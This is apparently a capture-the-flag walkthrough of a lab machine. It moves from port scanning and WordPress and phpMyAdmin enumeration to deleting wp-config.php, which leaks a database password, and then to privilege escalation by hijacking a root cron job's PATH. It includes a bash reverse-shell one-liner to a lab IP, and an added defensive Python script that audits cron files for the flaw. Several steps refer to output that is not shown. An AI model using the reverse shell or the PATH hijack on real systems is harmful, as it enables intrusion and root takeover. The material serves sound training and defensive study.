$ nmap -p- --min-rate 4000 192.168.197.174
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 21:06 +08
Nmap scan report for 192.168.197.174
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8888/tcp open sun-answerbook
Just 2 web ports, plus SSH.
Web Enumeration -> WP Creds
Port 80 shows a WordPress site:
Port 8888 on the other hand shows a phpMyAdmin instance:
When we view the page source of port 8888, there is an indication of the version running:
This version is vulnerable to an RCE exploit that requires credentials, which we'll keep in mind for now:
Default credentials don't work with this site. Since there was a WordPress site available, we can use wpscan for some basic enumeration. There was a lot of output, but I found this one vulnerability to be the most interesting for now.
With these credentials, we can login to the dashboard and begin checking out the other vulnerabilities:
Arbitrary File Deletion -> RCE
wpscan revealed many different types of exploits, including an authenticated RCE. However, since we aren't the administrator of WordPress, it's unlikely that we can get RCE directly through WP. So, I turned my attention towards exploiting phpMyAdmin.
Out of all the exploits that are available, it seemed that the Arbitrary File Delete works:
When run on the localhost, it causes the WordPress instance to start crashing, since wp-config.php no longer exists and the website cannot do anything without it. Searching more about this file deletion led me to this blog:
To exploit this, we can use the instructions given in the JS file. This involves using the Developer Console and pasting some code within it. Afterwards, we can just execute the function as required:
Once deleted, this kind of breaks the entire website. It just returns source code:
Using this, we can view the wp-config.php file since the website is no longer executing PHP:
$ curl http://192.168.197.174/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME','wordpress');

/** MySQL database username */
define('DB_USER','wordpress');

/** MySQL database password */
define('DB_PASSWORD','ThinnerATheWaistline348');

/** MySQL hostname */
define('DB_HOST','localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET','utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE','');
<TRUNCATED>
Using this password, we can achieve RCE on phpMyAdmin:
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Oct 11 2019 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Oct 25 2021 .
drwxr-xr-x 77 root root 4096 Dec 13 2021 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rw-r--r-- 1 root root 712 Dec 17 2018 php
-rw-r--r-- 1 root root 348 Oct 25 2021 wpclean
There's a wpclean job running periodically on the machine. Here are the contents of that script:
# /etc/cron.d/wpclean: crontab entries to cleanup wordpress uploads folder
HOME=/var/www/html/wordpress/wp-content/uploads
PATH=~/bin:/usr/bin:/bin
# in case the intern do something silly, delete all files with invalid image extension
*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpeg\|png\|gif\)' -exec bash -c "rm -f {}" \;
The first thing I noticed was that the job sets a custom HOME variable, that ~/bin under that HOME is the first directory in PATH, and that www-data can write to that HOME directory. The rm binary executed here is not given with its full path, so we can create our own rm file that gives a reverse shell when executed.
Here's the contents of my reverse shell:
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.177/4444 0>&1'
# need to specify full paths!
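As a defender's check for the weakness in the wpclean job above (a root cron entry whose PATH starts in a directory the web user can write to, and which runs bash and rm by bare name), here is an added Python audit script that is not part of the original writeup. It parses a cron.d file, lists every program a job resolves through PATH (descending into find -exec and bash -c strings) and flags PATH elements that are not absolute or that an unprivileged user can write to. The sample entry, the writable-directory set and the hardened variant are constructed for this example, and all function names are mine.

```python
import os
import re
import shlex
from typing import Dict, List, Set, Tuple

# Constructed sample, modelled on the /etc/cron.d/wpclean entry quoted in the writeup.
SAMPLE_CRON = r"""
# /etc/cron.d/wpclean: crontab entries to cleanup wordpress uploads folder
HOME=/var/www/html/wordpress/wp-content/uploads
PATH=~/bin:/usr/bin:/bin
*/5 * * * * root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpeg\|png\|gif\)' -exec bash -c "rm -f {}" \;
"""

# Constructed hardened version of the same job: root-only absolute PATH, absolute paths for
# every program, and an explicit directory instead of '.' (find -delete would avoid the shell).
HARDENED_CRON = r"""
PATH=/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root /usr/bin/find /var/www/html/wordpress/wp-content/uploads -type f -not -regex '.*\.\(jpg\|jpeg\|png\|gif\)' -exec /bin/rm -f {} \;
"""

ASSIGNMENT = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)=(.*)$')
SEPARATORS = {';', '&&', '||', '|', '&'}
EXEC_FLAGS = {'-exec', '-execdir', '-ok', '-okdir'}   # find(1) predicates that take a command
SHELL_NAMES = {'sh', 'bash', 'dash', 'ksh', 'zsh'}
BUILTINS = {'cd', 'echo', 'exit', 'test', '[', 'true', 'false', 'set', 'export', 'umask'}


def parse_cron_d(text: str) -> Tuple[Dict[str, str], List[Dict[str, str]]]:
    """Split a /etc/cron.d file into environment assignments and jobs (schedule, user, command)."""
    env: Dict[str, str] = {}
    jobs: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = ASSIGNMENT.match(line)
        if m:
            env[m.group(1)] = m.group(2).strip().strip('"\'')
            continue
        parts = line.split(None, 6)                  # 5 schedule fields, user, command
        if line.startswith('@'):                     # @reboot / @daily style: one schedule field
            parts = line.split(None, 2)
            parts = parts[:1] + [''] * 4 + parts[1:]
        if len(parts) < 7:
            continue
        jobs.append({'schedule': ' '.join(p for p in parts[:5] if p), 'user': parts[5], 'command': parts[6]})
    return env, jobs


def invoked_commands(cmdline: str) -> List[str]:
    """Every program name the command line runs: the first word, the word after each separator
    or find -exec, and, recursively, the contents of a 'sh -c <string>'."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:
        return []
    names: List[str] = []
    expect_command = True
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in SEPARATORS or tok in EXEC_FLAGS:
            expect_command = True
        elif expect_command and ASSIGNMENT.match(tok):
            pass                                     # VAR=value prefix; the command comes next
        elif expect_command:
            names.append(tok)
            expect_command = False
            if os.path.basename(tok) in SHELL_NAMES and i + 2 < len(tokens) and tokens[i + 1] == '-c':
                names.extend(invoked_commands(tokens[i + 2]))
                i += 2
        i += 1
    return names


def path_findings(env: Dict[str, str], writable_dirs: Set[str]) -> List[str]:
    """Flag PATH elements that are not absolute or that an unprivileged user can write to.
    '~' is shown expanded against the job's HOME to make clear which tree it points into."""
    findings: List[str] = []
    if 'PATH' not in env:
        return findings
    home = env.get('HOME', '')
    for idx, element in enumerate(env['PATH'].split(':')):
        candidate = home + element[1:] if element.startswith('~') and home else element
        if not element.startswith('/'):
            findings.append(f"PATH[{idx}] '{element}' is not absolute (points into {candidate or 'the job cwd'})")
        if candidate in writable_dirs:
            findings.append(f"PATH[{idx}] '{element}' -> {candidate} is writable by an unprivileged user")
    return findings


def unprivileged_writable(path: str) -> bool:
    """Live check for a real host: directory exists and is group/world writable or not root-owned."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & 0o022) or st.st_uid != 0


def audit_cron_d(text: str, writable_dirs: Set[str]) -> List[str]:
    """PATH findings plus every program a job runs by bare name (resolved through that PATH)."""
    env, jobs = parse_cron_d(text)
    findings = path_findings(env, writable_dirs)
    for job in jobs:
        for name in invoked_commands(job['command']):
            if '/' not in name and name not in BUILTINS:
                findings.append(f"job '{job['schedule']}' as {job['user']} runs '{name}' by PATH lookup, not by absolute path")
    return findings


if __name__ == '__main__':
    # Constructed: treat the uploads/bin directory as writable by www-data.
    writable = {'/var/www/html/wordpress/wp-content/uploads/bin'}
    for finding in audit_cron_d(SAMPLE_CRON, writable):
        print('[!]', finding)
    print('hardened entry findings:', audit_cron_d(HARDENED_CRON, writable))
```

On a live host, build the writable set from real directories with `unprivileged_writable` instead of the constructed set. Note that the audit flags `bash` as well as `rm`: the shell that find -exec spawns is itself resolved through the same PATH, so giving `rm` a full path alone would not close the hole, which is why the hardened entry also uses `/bin/rm` and drops the writable element from PATH.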